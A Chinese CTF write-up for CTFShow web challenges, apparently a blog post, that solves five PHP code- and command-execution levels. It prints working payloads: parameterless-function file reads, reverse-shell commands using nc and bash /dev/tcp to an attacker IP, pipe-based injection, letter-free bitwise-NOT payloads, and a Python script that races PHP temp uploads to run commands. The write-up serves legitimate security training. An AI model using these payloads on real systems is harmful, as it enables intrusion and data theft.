当前位置：首页 > article >正文

CTFShow _Web应用安全与防护第二章WP

article 2026/3/21 17:00:57

1.一句话木马变形看到了php代码解释器那么就可以输入一些php代码看看是否有什么过滤先输入一个phpinfo();成功返回了php相关信息那么可以尝试一些命令注入system(ls);成功返回了当前目录下的文件看到了flag文件那么就可以直接读取flag文件即可继续使有system函数system(tac fl*);这里提示了过滤信息那么就直接想到了无参数函数只需要函数之间的调用就可以实现读取文件show_source(next(array_reverse(scandir(pos(localeconv())))));这里粗略解释一下具体了解可以问问ai函数作用localeconv()返回系统本地化信息的数组核心数组第一个元素固定是 .当前目录pos()等价于current()获取数组的第一个元素 → 最终得到.当前目录scandir(.)扫描当前目录下的所有文件 / 目录返回数组比如[., .., flag.php, index.php]array_reverse()反转数组 → 比如[index.php, flag.php, .., .]next()将数组指针移到下一个元素并返回反转后数组第一个元素是index.phpnext()取第二个 →flag.phpshow_source()等价于highlight_file()高亮显示指定文件的内容 → 最终显示flag.php2.反弹shell构造刚刚开始还可以和上面的关卡一样测试但是这关只会返回“实现成功”典型的无回显的php想到题目说的反弹shell那么就可以直接进行反弹shell//在kali中输入x是与在题目一样的端口 nc -lvnp x //题目中输入 bash -i /dev/tcp/ip/端口 01 //这里我先是尝试bash但是没有成功说明靶场环境受限制了 nc -c sh ip 端口 //nc是大多数 Linux / 类 Unix 系统默认安装 nc或 busybox nc不管目标机是 bash/dash/sh只要有sh和nc就能执行看到页面一直加载说明就成功了到kail中就可以看到这里还有第二种方法写入静态文件先测试一下这个功能能不能使用echo 1 1.txt //将1写入当前目录的1.txt文档如歌当前目录没有这个文件那么就创建一个我们成功访问到了1.txt中我们写入的内容那么就可以使用这个方法那么就写入执行命令到txt文档中即可echo ls 1.txt echo tac fl* 1.txt //这里使用的是反引号反引号是php执行运算符php将尝试反引号中的内容作为shell命令来执行并将结果输出通过echo就可以输出看到3.管道符绕过过滤这关会自动执行一个ls命令只要能拼接上另外一个命令即可这里使用这些都可以tac fl* tac fl* |tac fl* ;tac fl* ctfshow||tac flag.php4.无字母数字代码执行这关比较特殊尝试了大多数命令都无法执行因为这关禁用了所有的数字和字母但是唯独对其他字符进行限制那我们可以尝试通过其他字符进行转化成为我们需要这里可以使用url编码取反操作?php $systemsystem; $commandtac flag.php; echo (~.urlencode(~$system).)(~.urlencode(~$command).);;//这里记得加上; //下面验证还原 echo (.~urldecode($k1).)(.~urldecode($k2).); ? //使用这三步操作是先将命令取反为了躲避过滤取反一般为不可见字符。然后进行url编码url编码是因为php会自动解码。最后输出时候再在输出语句前面添加上~PHP在解析这段字符时候御剑~会自动取反。5.无字母数字命令执行这关看似和上关类似同样禁用了数字和字母但是发现使用上关相同的payload时并没有输出flag只是输出我们输入的命令。说明大概率为无回显的这里我尝试了写入静态文件也没有成功这里借鉴了别的地方的方法这里先给代码再进行讲解。这段 Python 代码的核心是通过 HTTP POST 请求持续攻击目标服务器利用文件上传代码注入的方式执行系统命令读取 flag.php并循环检测响应中是否包含CTF{格式的 flag找到后立即输出并停止循环。import requests # 导入发送HTTP请求的库 import time # 导入时间相关库用于循环等待 url http://localhost:5058 # 目标攻击地址本地测试 # 1. 准备要上传的文件payload.txt里写了要执行的命令tac /var/www/html/flag.php file {file: open(payload.txt, r)} # 2. 核心注入payload. /???/????????[-[] —— 这是Linux命令注入的模糊匹配写法 data {code: . /???/????????[-[]} # 3. 无限循环发起请求直到拿到flag while True: # 发送POST请求上传文件提交注入的code参数 response requests.post(url, filesfile, datadata) # 检测响应中是否包含CTF{flag的特征 if response.text.find(CTF{)! -1: # 提取从CTF{开始到最后一位的内容即完整flag flag response.text[response.text.find(CTF{):-1] print(flag) # 输出flag break # 找到flag后退出循环 else: print(Waiting for flag...) # 未找到则提示 time.sleep(1) # 等待1秒后再次请求这关与web入门中的web55类似那一关只不过可以使用数字就还可以使用其他方法而这关目前也只了解这一种做法我简单讲一下原理我们可以发送一个上传文件的POST包此时PHP会将我们上传的文件保存在临时文件夹下默认的文件名是/tmp/phpXXXXXX文件名最后6个字符是随机的大小写字母。[-[]可以用来通配表示大写字母因为大写字母在与 [之间过滤掉干扰文件最后一位一般为大写而在linux系统下.是可以用来执行任意脚本文件的利用这两点我们可以构造payload。具体操作大家可以尝试一下web55练习一下那关wp我也会给大家借鉴一下。

CTFShow _Web应用安全与防护第二章WP

相关文章：

CTFShow _Web应用安全与防护第二章WP

如何在ESP32上运行TinyML模型

C++中的前置自增运算符与后置自增运算符

低成本边缘AI硬件开发实战：从芯片选型到量产部署

Web实现电脑画面预览鼠标远程操作

Ubuntu 22.04下RTX 4090多卡训练Qwen-14B，NCCL通信报错怎么解？（实测有效）

2026商用免许可音乐全攻略：合法商用无压力的优质平台终极盘点

人工智能时代算力基建哪家强？

健康有益健康监测座舱：以科技之力，定义出行健康新标杆

gorm 中的Updates Update, Save,Create , UpdateColumn 区别与联系

错误弹窗记录

从CUDA到MUSA（四）：GPU架构揭秘——从Warp到Occupancy

2026 年四可改造最后期限！这些省份必须完成

计算机毕业设计springboot校园智能卡管理系统设计与实现高校一卡通数字化管理平台的设计与实现基于Spring Boot框架的校园智慧卡服务系统开发

Dify 模型供应商下载失败解决办法

音叉这玩意儿在光热振动里真是妙啊，特别是用COMSOL建模的时候，玩参数就像调电子琴的旋钮。先给你们看段核心参数设置代码

java基于微信小程序的物流仓储管理系统可视化

数据中台数据权限体系：基于RBAC的精细控制

污水处理施耐德TM218 PLC程序开发与分享

9大主流CRM核心能力对比：从线索到报表的全流程专业解析

别让AI把你带沟里：调教这货帮你写代码的实战指南

ChurchCRM SQL注入漏洞（CNVD-2026-12565、CVE-2026-24854）

Spring面试高频题：从基础到源码，通俗拆解+避坑指南

使用yolov26实现目标检测

从入门到精通：Kafka核心原理与实战避坑指南

Unity网络基础UDP客户端

feed二级缓存设计day05

SpringBoot+Vue 办公信息系统管理平台源码免费分享【适合毕设/课设/学习】Java+Vue+MySQL

新能源汽车车载双向OBC，PFC，LLC，V2G 双向充电桩MATLAB仿真模型及应用分析

基于单片机的药品分拣系统